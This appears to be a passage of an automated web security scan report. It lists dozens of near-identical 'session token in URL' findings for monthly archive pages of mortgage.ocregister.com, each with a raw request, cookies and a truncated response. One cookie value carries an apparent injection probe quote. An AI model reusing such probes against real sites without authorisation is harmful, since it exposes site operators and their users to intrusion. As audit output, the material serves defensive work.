Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.21. http://mortgage.ocregister.com/2008/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 111978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.22. http://mortgage.ocregister.com/2008/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.23. http://mortgage.ocregister.com/2008/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.24. http://mortgage.ocregister.com/2008/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.25. http://mortgage.ocregister.com/2009/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.26. http://mortgage.ocregister.com/2009/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.27. http://mortgage.ocregister.com/2009/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.28. http://mortgage.ocregister.com/2009/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.29. http://mortgage.ocregister.com/2009/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.30. http://mortgage.ocregister.com/2009/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.31. http://mortgage.ocregister.com/2009/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.32. http://mortgage.ocregister.com/2009/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.33. http://mortgage.ocregister.com/2009/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.34. http://mortgage.ocregister.com/2009/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.35. http://mortgage.ocregister.com/2009/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.36. http://mortgage.ocregister.com/2009/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.37. http://mortgage.ocregister.com/2010/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.38. http://mortgage.ocregister.com/2010/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.39. http://mortgage.ocregister.com/2010/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2010/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


